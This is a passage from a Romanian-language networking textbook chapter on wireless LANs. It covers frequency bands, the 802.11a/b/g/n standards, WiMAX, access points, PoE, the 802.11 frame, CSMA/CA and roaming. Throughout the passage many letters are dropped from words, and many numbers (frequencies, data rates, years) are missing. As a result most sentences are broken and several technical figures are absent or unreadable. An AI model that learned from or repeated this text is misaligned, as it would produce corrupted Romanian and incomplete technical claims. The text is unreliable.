 Undele electromagnetice nu sunt protejate de semnale exterioare, precum este semnalul de
pe u a lu de up u p otejat de u izolato . Odată u os ută f e e ţa de transmisie a unei
eţele wireless, ad i ist ato ul de eţea t e uie să fie o ştie t de alte dispoziti e sau
teh ologii e fu ţio ează î a eeaşi f e e ţă.
 Semnalul wireless se ate uează odată u p opaga ea p i ediul fizi . Ate ua ea poate
interveni din mai multe cauze:
o a so i ea se alului î at osfe ă
o efe te te odi a i e auzate de ăldu ă sau u iditate spo ită
o i te fe e ţe u alte se ale
efle ia pa ţială a se alului pe sup afeţele dife itelo ate iale de o st u ţie

o
Din considerente legale, nu se poate t a s ite î spe t u pe o a u ită f e e ţă, fă ă a a ea
li e ţă pe a ea f e e ţă. O eţea wireless, ar fi greu de implementat atât din punct de vedere
i o ati , ât şi di pu t de ede e al p opagă ii î popula itate a teh ologiei, da ă fie are
utilizato , atu i â d şi-a u pă a u oute wireless, a t e ui să plăteas ă şi pe t u
li e ţie ea u ei e zi de f e e ţă î a e să t a s ită. Î afa ă de a est aspe t, f e e ţa
164 | ‘ e ţ e l e L o a l e
dispozitivelor wireless t e uie să fie a eeaşi î toată lu ea eţelelor de calculatoare, pentru ca

teh ologia să fie o pati ilă.
5.1.2.2 Be zile I“M şi UNII

Pentru a efectua o transmisie wireless este nevoie de li e ță di pa tea u ei auto ităţi.
“p e e e plu, statul o â a a o dat li e ţă postului de adio Eu opa FM să t a s ită î
a da de , MHz pe te ito iul o aşului Bu u eşti. O a ge şi Vodafo e au li e ţă pe t u a
efectua transmisii în benzile: 890 MHz – 960 MHz respectiv 1710 MHz – 1880 MHz.
E ista totuşi o etodă de a efe tua t a s isii fă ă li e ţă: t a s isia î u a dintre benzile
ISM (Industrial, Scientific and Medical) sau UNII (Unlicensed National Information
Infrastructure). S-a ăzut de a o d ă la i el i te aţio al a este e zi să u fie li e ţiate,
astfel î ât să poată fi utilizate de o i i e. D ept o se i ţa, u este e oie de li e ţă pe t u a
a ţio a tele o a da de la ala ă, pe t u a utiliza telefo ul cordless, sau pentru a folosi un
mouse sau o tastatu ă wireless. Toate a estea ope ează î u a di t e e zile I“M sau UNII.
Pentru a elimina necesitatea o ţi e ii u ei li e ţe pe t u utiliza ea eţelelo wireless, şi
a estea fu ţio ează î a este e zi. E istă două e zi I“M de i te es pe t u teh ologia
wireless: 2,4 GHz – , GHz şi , GHz – , GHz. Di , odată u sta da dul
802.11h, s-a adăugat şi a da UNII de . - . GHz. A easta ouă a dă a fi dis utată
mai târziu în capitolul de comunicare wireless [5.1.6.3]
Notă: La î eputu ile teh ologiei i eless, se folosea şi f e e ţa de MHz. Î să, di
auza faptului ă doa âte a ţă i utilizau ofe eau posi ilitatea de utiliza e fă ă li e ţă, a da
a fost et asă.
Faptul ă se lu ează î e zile I“M adu e î să după si e o o st â ge e: î a este e zi
este li itată legal posi ilitatea de a t a s ite u se al de pute e a e. “ opul a estei
ăsu i este de a li ita dista ţa a i ă de t a s isie î ede ea edu e ii i te fe e ţei î t e
e hipa e tele di e şilo utilizato i. Astfel, aza de fu ţio a e a eţelelo wireless este
li itată p i lege.
5.1.2.3 Fre e ța . GHz vs 5 GHz

De la apa iţia primelor tehnologii wireless, soluţiile e iste te se î pă ţeau î t e a da de
. GHz şi a da de GHz. Fie a e di t e a estea ofe ă a a taje şi deza a taje de
i ple e ta e şi fu ţio alitate. Dife e ţele di t e e zi se edu de fapt la dife e ţele î t e
t a s isiile î f e e ţă î altă şi ele î f e e ţa joasă. Î ele e u ează, se a ealiza o
o pa aţie î t e ele două şi se a sfâ şi p i a dese a a da ea ai utilizată î p eze t şi
oti ele di spatele adoptă ii a esteia.
 Dista ţa de p opaga e
U dele de f e e ţa joasă su t a so ite foa te puţi î at osfe ă, de a eea ele pot
st ă ate dista ţe foa te a i. Cu ât eşte f e e ţa u ei u de, u atât a easta este a so ită
ai ult î at osfe ă. De ase e ea, u dele joase p ezi tă o apa itate de penetrare a
materialelor foarte mare, fiind cu atât mai potrivite pentru transmisiile de date. Spre
deose i e de a estea, u dele de f e e ţe a i ti d să sufe e efle ii şi ef a ţii pe di e se
sup afeţe.
Co luzio â d, da ă se foloseşte a da de . GHz, a so ţia î at osfe ă o să fie ai
i ă, efle ia se alului de ase e ea, de i dista ţa posi ilă de p opaga e o să fie ai a e.
 Lăţi ea de a dă
165 | W i r e l e s s
Folosi d o f e e ţa ai a e o ţi e o eşte e ap o i ati li ia ă a lăţi ii de a dă.

Spre exemplu, folosi ea e zii de MHz ofe ea o a dă de K ps. Odată u t e e ea la
. , a da teo eti ă a aju s la aloa ea de M ps.
 I te fe e ţe u alte teh ologii

Di efe i i e, a da de , GHz a aju s să fie destul de aglo e ată. Î a eastă a dă
ope ează Bluetooth, perifericele wireless, tele o e zile şi alte dispoziti e u a e o apă ea
i e ita il i te fe e ţe. Ba da de GHz este destul de puţi o upată î să deza a tajul este
a so ţia ai a e a se alului î ediul fizi .
 Costul echipamentelor
Costul e hipa e telo e fu ţio ează i a da de GHz su t se si il ai s u pe de ât
ele di a da de . GHz. A esta a fost şi u ul di oti ele pe t u a e teh ologia de .
GHz a âştigat te e pe piaţa wireless.
Ta elul de ai jos si tetizează p op ietăţile u delo , p eze tate pâ ă a u :
Criteriu/Fre e ță Fre e țe i i Fre e țe ari

Dista ţă mare i ă
Lăţi e de a dă i ă mare
I te fe e ţe mari mici
Cost mic mare
5-2: Proprietățile u delor ele tro agnetice
F e e ţa el ai des utilizată î p eze t î eţelele de date este ea de . GHz. Deşi ult

ai aglo e ată, a easta s-a bucurat de mult suport din parte third-parties precum Centrino
sau WI-FI Aliance. Componenta de business a monopolului benzii de . GHz a fi dis utată î
u ătoa e se ţiu e.
5.1.3 Standarde pentru reţele locale WLANs
5.1.3.1 Standardul 802.11b

La sat î , . este al doilea p oto ol a şi popula itate î zilele oast e.
Ope ează î a da I“M de , GHz şi ati ge o a dă de M ps. 802.11b este performerul la
capitolul rază a eţelei: pe t u ă ope ează la o f e e ţă i ă, a easta poate aju ge la âte a
sute de et i şi pe et a pâ ă la - pe eţi de eto folosi d e hipa e te o e ţio ale.
La capitolul interoperabilitate cu alte standarde, un echipament 802.11b poate comunica
u u ul . g, da u u u ul . a. Deşi a est sta da d a apă ut odată u . a, a
euşit să se i pu ă p i p eţu ile e hipa e telo ai s ăzute şi p i supo tul pe a e l-a
1
primit din partea Wi-Fi Alliance . La apa iţia . , o ga izaţia a ealizat u ou a d pe
care l-a popula izat şi l-a promovat, oferind standardului numele de Wi-Fi. De asemenea au
fost eate şi stickere spe iale a e i di au da ă u dispoziti este sau u o pati il u a est
standard.
Deza a tajul ajo ţi e, î să, de a dă: M ps este destul de puţi şi, e e i d la
dis uţia u a da eală e se î pa te î t e staţii, se poate spu e ă . u se p etează la
eţele ai a i.
1
Wi-Fi Allia e este u o so ţiu fo at di peste di t e ele ai a i ompanii din domeniul IT,
a â d a s op p o o a ea şi dez olta ea teh ologiilo wireless.
166 | ‘ e ţ e l e L o a l e
“e ai foloseşte . ? Î ge e al, astăzi, u p ea ai e istă pe piaţă e hipa e te

e lusi . i doa . /g. Mai poate fi î să folosit de ăt e dispoziti e a e au e oie
de a ope i e a e şi u de lăţi e de a dă. O se ie de siste e embedded i t ă î a eastă
ulti ă atego ie.
5.1.3.2 Standardul 802.11a

Deşi a apă ut a sta da d î a elaşi ti p u . , e hipa e tele . a u au apă ut
pe piaţă de ât sp e sfâ şitul a ului . . a este si gu ul di fa ilia de p oto oale
WLAN, a e ope ează î f e e ţa de GHz, ofe i d o lu gi e de a dă de 54 Mbps. Pentru a
putea ofe i o iteză ai u ă de ât Wi-Fi la o f e e ţă ai a e, sta da dul foloseşte o
odula e a a sată a u dei pu tătoa e de se al, u ită OFDM Orthogonal Frequency
Division Multiplexing). Prin intermediul acesteia, microundele se compun într-un mod
edest u ti î ae o upâ d ult ai efi ie t a da ofe ită de a alul fizi î t -un interval
ăsu at de ti p. C es â d a titatea de i fo aţie utilă pe se u dă, eşte şi lăţi ea de
a dă pe a e teh ologia o pu e la dispoziţie.
Avantajele sta da dului . a su t, î p i ul â d, lăţi ea de a da şi lipsa
i te fe e ţelo .
Pă ţile ai puţi u e ale teh ologiei su t to ai u a ea faptului ă se ope ează la
f e e ţe foa te a i. La GHz se află microundele e au o lu gi e de u dă de doar 6 cm.
Astfel de u de se a so foa te uşo î ae şi se efle tă pe di e se sup afeţe, eputâ d
pe et a uşo ate ialele. O o se i ţa i te esa tă a a estei p op ietăţi fizi e, este folosi ea
a estui sta da d î edii î a e se do eşte o se u itate spo ită la i el fizi . Î ge e al este
destul de g eu să se asigu e o t olul p opagă ii u delo ele t o ag eti e, da da ă eţeaua
t e uie a plasată î t -u a fiteat u î a e sup afeţele pe eţilo au u g ad de efle ie a e,
se p efe ă sta da dul . a pe t u o ai u ă izola e a se alului la i elul î ăpe ii.
5.1.3.3 Standardul 802.11g

Pâ ă la apa iţia . g, foa te ultă lu e folosea . . La sat î , . g
o i ă a a tajele . a a da de M ps u a a tajele . ază a e de
acope i e . Astfel, . g ope ează î a da I“M de , Ghz şi foloseşte OFDM pe t u
atingerea ratei de transfer de 54 Mbps.
Succesul 802.11g s-a dato at şi păst ă ii o pati ilităţii u . , teh ologia ea ai
ăspâ dită pâ ă atu i. Toate e hipa e tele 802.11g sunt compatibile cu cele b. De fapt,
acestea pot opera în ambele standarde. Astfel, s-a putut realiza o trecere comodă de la b la g
p i î lo ui ea t eptată a e hipa e telo , fă ă a fi e esa ă o i estiţie a e î t -un timp
scurt.
Spre deosebire de . a, a da de M ps u a e u g ad atât de a e de o sta ţă
dato ită i te fe e ţelo ai a i di a da I“M de , GHz î apo t u ea de GHz. Î să
f e e ţa ai i ă pe ite păst a ea alităţii se alului pe dista ţe ult ai a i,
degradarea e zii de M ps fii d ult ai le tă de ât la . a.
Astăzi, . g este âştigăto ul a solut î lupta î t e sta da de.
5.1.3.4 Standardul 802.11n

U a di p i ipalele p o le e u a e se o f u tă eţelele wireless a tuale este lăţi ea
de a dă. Cea ai a e lăţi e de a dă ofe ită de u sta da d WLAN este de M ps.
Astfel, IEEE a eat î u g up de lu u pe t u dez olta ea u ui p oie t a e să ezol e
e oile tot ai a i de iteză şi sta ilitate ale utilizato ilo . Aflat la e siu ea . a draft-ului
167 | W i r e l e s s
p oie tului, se aşteaptă a oul sta da d să fie fi alizat î de u sul a ului , el tâ ziu
2009.
Noul sta da d îşi p opu e să ofe e o a dă de M ps şi o ază de a ope i e de -4 ori
ai a e de ât a sta da delo a tuale. Î a elaşi ti p, p i ă i ea atei de t a sfe şi
i şo a ea ti pului de fu ţio a e a dispoziti ului, se a di i ua o su ul de e e gie.
Pe t u a eşte pe fo a ţele, sta da dul se azează pe teh ologia MIMO Multiple Input
Multiple Output a e foloseşte u siste de ai ulte a te e pe t u t a s isia şi e epţia
datelo . O e i ţă i po ta tă pe t u oul sta da d este păst a ea o pati ilităţii u
sta da dele deja e iste te . a/ /g. Astfel, u e hipa e t . a putea fu ţio a fie
în banda de 2,4 GHz, fie în banda de 5 GHz.
Î iuda faptului ă sta da dul u este deo a dată fi alizat, o se ie de p odu ăto i au fost
at aşi de pe fo a ţele teo eti e ofe ite de oua teh ologie şi au î eput deja să ofe e
p oduse azate pe e siu ea . ale spe ifi aţiilo te po a e.
5.1.4 Wireless MAN

Î eţele lo ale, sta da dul wireless a fost foa te i e p i it de ăt e piaţă, u os â d o
e oluţie o sta tă de-a lu gul ti pului. Di pă ate, lu u ile u stau delo astfel î
WAN/MAN. Î ge e al se p esupu e a u e istă i ple e tă i de wireless MAN, sau ă
a estea e istă, da î u ă foa te i . De fapt e istă ulte soluţii wireless MAN
i ple e tate, î să p o le a este ă % di a estea su t p op ieta e. Fu ţio ează u
p oto oale dez oltate i te de ăt e fi ele e deţi eţeaua şi fii d ă fie a e o pa ie îşi
dez oltă p op iul set de eguli, i eî ţeles ă a estea u pot să fu ţio eze o u i e î t e
ele. Singurul standard wireless dezvoltat pentru MAN este 802.16e, sau WiMAX (Worldwide
Interoperability for Microwave Access).
O cone iu e Wi eless MAN ofe ă o lăţi e de a dă de pâ ă la M ps î azul WiMAX.
A ia de a ope i e a u ei staţii de ază este de pâ ă la k î od teo eti . Î ediul u a
î să, este posi ilă o acoperire de 2-5 km pentru WiMAX Mo il. T e uie să e ţio at faptul ă
ede ea di e tă Lo“ – Line of Sight î t e staţia de ază şi te i al u este e esa ă.
Deşi e istă posi ilitatea utiliză ii u o e zi eli e ţiate de ge ul elei de GHz, î ge e al
se foloses f e e ţe li e ţiate pe t u a putea a ea o t ol asupra spectrului. Pot fi folosite
o i e f e e ţe di i te alul -11 GHz (2-6 GHz în cazul WiMAX Mo il , î să i stituţiile de
sta da diza e e o a dă folosi ea e zilo de , GHz, , GHz sau , GHz pe t u a putea
avea o interoperabilitate a echipamentelo şi, de ai i, o s ăde e a p eţu ilo .
Un avantaj important al WiMAX este faptul ă ofe ă supo t pe t u alitatea se i iilo
(QoS - Quality of Service).
5.1.5 )mplementarea reţelelor wireless
5.1.5.1 Topologii wireless

WLAN-u ile se lasifi ă î două tipu i di punct de vedere al topologiei:
 ‘eţele ad hoc
 ‘eţele de tip i f ast u tu ă
168 | ‘ e ţ e l e L o a l e
5-3: Rețea ad hoc
O eţea ad hoc este echivalentul în Ethernet al u ei eţele full- esh, î a e fie a e staţie
este o e tată p i i te faţa wireless di e t la elelalte staţii. Cu alte u i te, t afi ul ge e at
de o staţie A, desti at u ei staţii B, t e e di e t de la A la B, fă ă u dispoziti i te edia .
5-4: Rețea i frastru tură
O reţea de tip i f ast u tu ă p esupu e e iste ţa u ui dispoziti e t al a e se o upă de

a age e tul eţelei wireless şi p i a e t e toate pa hetele di eţea î d u ul lo de la
su să, sp e desti aţie. A est dispoziti e t al poate fi u a es poi t sau un router wireless.
5.1.5.2 Echipamente wireless de interconectare

Access point-urile, sau mai pe scurt AP-u ile, joa ă olul de pu t e t al de o u i aţie
într-o eţea wireless.
De ase e ea, tot ele su t ele e i te o e tează eţelele fă ă fi u i f astructura wired.
Ele dispu de o i te faţă wired pe t u i te o e ta ea la eţeaua u fi şi u a wireless pentru
o u i aţia u staţiile e hipate u i te feţe wireless. AP-u ile pot fi ăzute a şi huburile din
eţeaua Ethernet di pu t de ede e al fu ţio alităţii î eţea.
U AP a e două fu ţii de i el i po ta te:
 Aso ierea lie ților p esupu e i lude ea lie ţilo la i el î eţeaua wireless.
169 | W i r e l e s s
 Aute tifi area lie ților p esupu e e ifi a ea ide tităţii lie ţilo e do es să se o e teze
la reţea î azul î a e se foloseşte u e a is de se u itate spe ifi
La p i a ede e, o eptul de aso ie e de i el la o eţea poate su a o fuz. Î t -o
eţea u de p oto olul de i el este Ethernet, u e istă o eptul de eţea de i el . Î t -o
topologie . , oţiu ea de eţea e istă doa la i el supe io , la i el IP. Î să, î t -o eţea
wireless, o eptul de eţea e istă atât la i elul p oto olului . , ât şi la i elul
protocolului de nivel 3.
O eţea wireless, este ide tifi ată la i el 2, de un nume special, denumit în standard: SSID
(Service Set Identifier). Da ă u lie t do eşte să se aso ieze u o eţea wireless (termenul de
aso ie ea se efe ă i pli it la o e ti itate de i el , t e uie să u oas ă SSID-ul acestei
eţele. Majo itatea lie ţilo wireless pe it s a a ea ediului pe t u a găsi SSID-ul eţelelo
la a e se pot aso ia. După e o staţie s-a aso iat u ei eţele, se a fa e o cerere DHCP pentru
a o ţi e o ad esă IP. ‘ăspu sul la a eastă e e e a t e ui sa i ă fie de la un server DHCP
dedi at aflat pe o staţie î eţea, fie di e t de la AP î azul î a e AP-ul are deja integrat un
server DHCP).
Routerele wireless su t dispoziti e a e pot ealiza î a elaşi ti p fu ţiile u ui AP, u ui
s it h de i el şi u ui oute . A este e hipa e te su t p e ăzute u:
 O a te ă wireless - pe t u î depli i ea fu ţiilo de AP
 Unul sau mai multe porturi de LAN - aceste porturi sunt de fapt conectate într-un switch care
se află î ău t ul oute ului wireless, acesta fiind transparent pentru utilizatori. Porturile
a estea su t p eze te pe t u a putea ofe i şi fu ţio alitate de s it h, î t -o eţea î a e u
toate staţiile au i te feţe wireless. Între oricare dintre aceste porturi se face switching.
 Un port de WAN – acest port este cel la a e se leagă o e iu ea de la I“P. Î t e a est po t şi
oricare dintre porturile de LAN, se face rutare.
Bridge-u ile sea ă ă foa te i e u access point-urile din punctul de vedere al arhitecturii
ha d a e. Ele su t folosite î să pe t u i te o e ta ea eţelelo p i t -o legătu ă wireless. Un
exemplu tipic de utilizare a bridge-u ilo este ealiza ea u ei o e iu i î t e două lădi i.
Un bridge, ase e i u ui AP, a e o i te faţă wired şi u a wireless: cadrele ce vin pe una
di t e i te feţe su t t a s ise ăt e ealaltă, u e e tuala t a slaţie î t e fo atele ad elo
elo două eţele. De ase e ea, u bridge poate de ide să u t a s ită ai depa te u
pa het î azul î a e ştie ă desti ata ul se află î eţeaua di a e a e it pa hetul. U
bridge î să, u pe ite aso ie ea odu ilo , de a eea, pe t u a o e ta ai ulte staţii
dotate u i te feţe wireless, este în continuare nevoie de un access point.
5.1.5.3 PoE (Power over Ethernet)

Î i ple e ta ea u ei eţele wireless, amplasarea AP-ului este foarte impo ta tă. Lo ul î
a e se o tează dispoziti ul e t al al eţelei u a t e ui să depi dă de i i alt e a î
afa ă de a ope i ea ât ai u ă a lo aţiei. Î să AP-ul nu este un dispozitiv pasiv, ci are nevoie
de ali e ta e de la eţeaua ele t i ă pe t u a fu ţio a. Di a est oti , de ulte o i AP-ul se
i stalează de fapt a olo u de e istă ali e ta e şi u î lo ul di a e a ofe i a ope i e
opti ă.
Pe t u a ezol a a eastă p o le ă, ulte di s it hu ile di p eze t ofe ă PoE (Power
over Ethernet). Această teh ologie p esupu e t a s ite ea de u e t ele t i pe a eleaşi fi e
pe a e se fa e şi t a s isia de date. Ideea u este u a ouă a easta e istâ d i ple e tată şi
în telefonie.
Deşi te siu ea ofe ită este doa de V, a easta este î deaju s pe t u dispozitive precum
AP-u ile sau telefoa ele IP. Î o luzie, folosi d s it hu i u PoE, este de aju s să se
conecteze AP-u ile la a estea u u a lu UTP, şi a estea o fi î a elaşi ti p ali e tate şi
o e tate la eţea.
170 | ‘ e ţ e l e L o a l e
Da ă se do eşte şi ai ult i i iza ea depe de ţei faţă de eţeaua ele t i ă, se poate

conecta un UPS1 la s it hul u PoE, păst â d astfel o e ti itatea wireless î eţeaua lo ală şi
î o e tul î a e u e istă u e t ele t i .
5.1.6 Comunicarea wireless
5.1.6.1 Formatul cadrului 802.11

Având în ede e ă eţelele wireless su t el ai adesea o ti uate p i eţele Ethernet,
u ul di itu ile false ale lu ii eţelelo de al ulatoa e este a fo atul ad ului este ide ti
î a ele sta da de. Î ealitate odul de fu ţio a e şi e i ţele u ei eţele wireless, sunt
destul de diferite de ceea ce presupune standardul Ethernet. În continuare se vor expune
ase ă ă ile di t e ele fo ate, pu â du-se accent pe cadrul 802.11.
5-5: Formatul cadrului 802.11
Notă: î dese ul de ai sus, if a e se află deasup a fie ă ui â p di ad u spe ifi ă

nu ă ul de o teţi o upat î a tet ia ă i ea â pu ilo de su „ o t ol ad u este
e p i ată î iţi. “pe ifi aţiile di figu a au fost e t ase di sta da dul republicat de IEEE în
2007.
P i a o se aţie este ă di e siu ea a i ă posi ilă a ad ului wireless este de 2346 de
o teţi. După u s-a specificat în capitolul 2, protocolul Ethernet nu permite un MTU mai
a e de o teţi. Ce se a î tâ pla de i, ând un cadru wireless de dimensiunea mai mai
mare de 1518 bytes, va intra într-o eţea Ethernet? Cum la nivelul 2, protocolul Ethernet nu
ofe ă o posi ilitate de f ag e ta e a u ui ad u de di e siu e p ea a e, p oto olul de i el
superior (cel mai adesea este o a de IP a t e ui să ofe e se i iul de f ag e ta e.
Bi eî ţeles a a est p o es a a ea î totdeau a lo î i te io ul u ui bridge sau AP.
Notă: în general MTU-ul de pe eţele wireless este setat implicit la maxim 1518 pentru a
evita procesul de fragmentare care introduce un overhead de procesare la nivelul
e hipa e telo de eţea.
Primul câmp din cadrul wireless este u it ad ul de o t ol şi o upă o teţi. Cele ai
i po ta te i fo aţii pe a e a esta le fu izează su t iţii de To DS2 şi From DS. Cele 4
o i aţii a e se pot o ţi e di a ie ea alo ilo a esto iţi ofe ă o i te p eta e u i ă a
celor 4 adrese MAC din cadrul wireless. Î o ti ua e se o p eze ta a este i te p etă i:
1
Uninterruptible power supply – dispoziti e a e î azul u ei pa e de u e t, pot ofe i e e gie ele t i ă,
fă ă a î t e upe flu ul de ali e ta e.
2
Distribution System – termenul este echivalent cu access point.
171 | W i r e l e s s
ătre AP de la AP adresa 1 adresa 2 adresa 3 adresa 4

0 0 desti aţie su să BSSID -
0 1 desti aţie BSSID su să -
1 0 BSSID su să desti aţie -
1 1 receptor t a s iţăto desti aţie su să
5-6: Utilizarea â purilor " ătre AP" şi "de la AP"
Pe t u o ai u ă î ţelege e a â pu ilo de ai sus, se e o a dă o sulta ea

standardului IEEE publicat în 20071.
I i te io ul ad ului . este p eze t şi u â p de du ată. A esta fusese eat pe t u
a ofe i u ei staţii posi ilitatea de a putea o u i a elo lalte staţii pe ioada î a e a easta a
o upa ediul. “e a a aliza pe s u t u s e a iu si plu pe t u a ele a i po ta ţa a estei
fa ilităţi.
1. Se presupune ă î t -o eţea wireless, staţia A ea să t a s ită.
2. Aceasta va asculta mediul (Carrier Sense şi da ă este liber (Multiple Access a î epe să
t a s ită o pletâ d şi â pul de du ată u o aloa e esti ată.
3. Cad ul pe a e staţia A îl a t a s ite a aju ge la toate staţiile a e su t î aza sa de
transmisie.
4. “taţia B as ulta şi ea ediul, ă i oia să t a s ită. Câ d a p i i ad ul staţiei A, a iti î
â pul de du ată ă a easta a o upa ediul ti p de se u de.
5. Ştii d ă ti p de se u de ediul a fi o upat u t a s isia staţiei A, staţia B u a ai s a a
ediul î a est i te al şi astfel a o serva, astfel, putere.
La î eputu ile sta da dului, ideea e a u a destul de p a ti ă, ă i dispoziti ele a e su t
î ge e al dotate u apa ilităţi wireless, au a u ulato i u ti p li itat de fu ţio a e. “-a
o se at î să, ă i fo aţia de du ata poate des hide eţeaua la u ele hi e de se u itate şi de
a eea â pul de du ată u este folosit î o u i aţiile di p eze t.
5.1.6.2 Accesul la mediu

‘eţelele . se ai u es , e o at, „Wireless Ethernet . Deşi ele două teh ologii au
u ele lu u i î o u , ase ă ă i ajo e î t e ele u e istă i i la i el fizi , i i la i elul
legătu ă de date.
Î spe ifi aţia Ethernet teh i a de a es la ediu este C“MA/CD. A easta î să se efe ă la
situaţia î a e ediul este o u , adi ă fie se utilizează huburi, fie topologiile erau de tip
agist ală. Astăzi î să, niciuna di t e situaţiile a estea u ai este î tâl ită î p a ti ă: se
utilizează s it hu i e eli i ă oliziu ile de pa hete pe ediu, a easta fă â d C“MA/CD
i utilă. P i t e e efi ii se u ă ă atât o u i aţia full-duplex ât şi a da ga a tată.
Î azul eţelelo wireless e î toa e î să la situaţia î a e ediul este pa tajat, di
a est pu t de ede e, eţeaua fă ă fi se ă â d u o eţea Ethernet azată pe hu . A u ite
pa ti ula ităţi fa î să C“MA/CD să fie i efi ie tă î azul t a s isiilo fă ă fi .
“ă o side a u ăto ul e e plu: t ei staţii A, B şi C fa pa te di t -o eţea wireless
adhoc. B este î aza lui A da C u. A do eşte să t a s ită ăt e B.
1
http://standards.ieee.org/getieee802/download/802.11-2007.pdf
172 | ‘ e ţ e l e L o a l e
5-7: Pro le a stației as u se
Da ă se foloseşte C“MA/CD, atu i A a as ulta ediul şi da ă u e epţio ează se al,

a î epe să t a s ită. Ce se î tâ plă da ă C t a s ite ăt e B î o e tul a esta? A u a
e epţio a se alul pe t u ă C u e î aza sa de a ope i e, aşa ă a î epe să t a s ită
odată u staţia C, ezultâ d astfel o oliziu e pe ediu. A eastă p o le ă se u eşte
pro le a stației as u se.
Pe lâ gă a est ge de p o le e, ai apa e î ă u a, de o di teh i : u t a s ei e adio
nu poate t a s ite şi e epţio a î a elaşi ti p. Aşa ă o staţie nu poate asculta mediul în
timp ce transmite, pe t u a edea da ă a apă ut eo oliziu e.
5.1.6.2.1 CSMA/CA
În concluzie, nu putem folosi CSMA/CD pentru a asigura accesul la mediul wireless
pa tajat. “oluţia adoptată de sta da d se u eşte C“MA/CA (Carrier Sense Multiple
Access/Collision Avoidance). Fu ţio a ea a estui e a is se azează pe t i ite ea u ui
cadru special de ACK de la desti aţie la su să, după fie a e ad u . p i it la desti aţie.
Da ă după t i ite ea u ui ad u, u se p i eşte u ACK, se aşteaptă u ti p aleato şi se
î ea ă di ou să se t i ită ad ul pe t u a e u s-a primit ACK. “e a alizează modul în care
a eastă etodă ezol ă p o le a staţiei as u se:
 “taţia A as ultă ediul şi u dete tează p eze ţa u ui se al î epe să t a s ită
 “taţia C fa e e a t a elaşi lu u şi î epe şi ea să t a s ită
 “e p odu e o oliziu e î t e ele două ad e şi i iu ul di ele u aju ge la staţia B, de i staţia
B nu trimite ACK i i staţiei A, i i staţiei C
 A ele staţii aşteaptă u ti p p edefi it î a e aşteaptă ACK. Da ă ti pul de aştepta e
e pi ă a ele staţii o aştepta u ti p aleato iu u it DIF“ Distributed Interframe Spacing)
î ai te sa t a s ită di ou.
Ate ţie! deoarece în wireless, pe t u fie a e ad u t i is, se aşteaptă u ACK, banda
efe ti ă de a e se dispu e, este de la î eput î ju ătăţită.
O altă etodă de a es la ediu p e ăzută î C“MA/CA p esupu e folosi ea u o esaje
speciale de tip RTS (request to send şi CT“ clear to send . Folosi d a est e a is , o staţie
î t ea ă AP-ul da ă ediul de t a s isie este li e folosi d u esaj de tip ‘T“. A est ad u
ajunge doar la AP. AP-ul, fii d pu tul e t al al eţelei, u a e p o le a staţiei as u se. Da ă
mediul este liber, AP-ul t i ite u CT“ î a e spe ifi ă staţia e a o ţi ut pe isia de a
t a s ite. Mesajul de tip C“T aju ge la toate staţiile di eţea, u doa la ea a e a e ut
a es la ediu p i esajul ‘T“ a te io . Astfel staţia e do ea să t a s ită a p i i a es, iar
elelalte staţii o o side a ediul o upat de a easta.
173 | W i r e l e s s
5.1.6.3 Ca ale de o u i ație

După u se poate o se a pâ ă î a est pu t, deşi C“MA/CA p e ede o etodă de
o u i a e fu ţio ală, totuşi u ofe ă o soluţie a două staţii să poată t a s ite î a elaşi
ti p, pe a eeaşi f e e ţă. S-ar o ţi e o oliziu e u ată de et a s ite ea pa hetului. De i,
u se pot o ţi e două eţele wireless, a e să fu ţio eze î a eeaşi a da I“M, şi a e să u
p odu ă o oliziu e sau să i te fe eze u a u ealaltă. ‘ăspu sul ezidă î a aliza lăţi ii de
a dă a e este folosită î t -o transmisie wireless. Lăţi ea de a dă este pâ ă la u a o plaja
de f e e ţe î a e se t a s ite u se al.
Se va lua ca exemplu standardul 802.11g. Pentru a putea transmite 54 Mbps, folosind
OFDM şi teh i i de t a s isie î spe t u î p ăştiat, este e oie de o plajă de f e e ţe de
doa Hz. Da a da I“M de , GHz se î ti de î t e , şi , Ghz o plajă de Hz .
De i se pot t a s ite si ulta î a eastă a da I“M, / fluxuri wireless separate, care
fu ţio ează fie a e î t -o a dă sepa ată de Hz.
A este e zi de Hz, se u es a ale. Folosi ea ai ulto a ale, fa e posi ilă
oe iste ţa a două eţele wireless a e fu ţio ează î a eeaşi a dă I“M, î a elaşi domeniu
de p opaga e. “ta da dul . g spe ifi ă e iste ţa ai ulto astfel de a ale a e su t
spaţiate la doa MHz u ul de elălalt şi a e se sup apu pe o a dă de MHz. De e su t
p e ăzute ai ulte a ale a e i te fe ează u ul u elălalt, în loc de trei canale complet
i depe de te? Pe t u ă se do eşte posi ilitate eglajului fi î azul u ei i te fe e ţe de
interval mic la unul din capetele unui canal.
Lă gi ea e zii I“M dife ă î t e sta da dul di A e i a şi el di Eu opa. Î ti p e în
A e i a se spe ifi ă i te alul , - 2,473 Ghz, î Eu opa se p e izează plaja de , GHz
pâ ă la , GHz. Cele a ale e u i te fe ează su t , şi î A e i a şi , şi î
Europa.
În anul 2003 IEEE a publicat standardul 802.11h, care a fost încorporat în 802.11 în 2007.
A est a e da e t adus sta da dului o igi al i t odu e şi a ale supli e ta e î e zile UNII
pe t u eţelele . a. Î p eze t, se e efi iază de de a ale î “tatele U ite şi de î
Europa.
5.1.6.4 Roaming
Colocalizarea mai ulto eţele poate fi folosită şi î alt s op: ă i ea a ope i ii şi e zii
u ei eţele wireless p i adăuga ea de access point-uri. Pentru a realiza acest deziderat, nu
este sufi ie t să adăuga ai ulte AP-u i la eţea aşa u pu e ai ulte e u i pentru a
fa e ai ultă lu i ă. Î o e tul î a e apa ai ulte access point-uri, automat se
eează ai ulte eţele wireless. Î o se i ţă, o apă ea oliziu i î t e ele da ă u folosi
canale disjuncte.
5-8: Roaming
174 | ‘ e ţ e l e L o a l e
Topologia di figu ă poa tă u ele de E““ Extended Service Set şi fu ţio ează astfel:
AP-u ile su t o e tate î a elaşi eţea Ethernet şi fu ţio ează espe ti pe a ale
disjuncte (1-7- . Astfel, â d o staţie i t ă î aza de a ope i e a eţelei, ea a fi aso iată AP-
ului u se alul el ai pute i di a ea zo a. Ai i se apli ă fu ţia de easo ie e a AP-urilor.
Da ă o pe soa ă u u PDA t a e sează de la stâ ga la d eapta eţeaua, PDA-ul va fi asociat pe
â d fie ă uia di t e AP-uri. Spre exemplu când semnalul de la access point-ul 1 devine prea
slab, adaptorul va fi intrat deja în raza access point-ului şi a fi aso iat a estuia fă ă
pie de ea o e iu ii la eţea. A est se i iu, a şi la telefo ia o ilă, poa tă u ele de
roaming.
Folosind o topologie ESS, nu se extinde doar aza eţelei, i şi se ofe ă ai ultă a dă
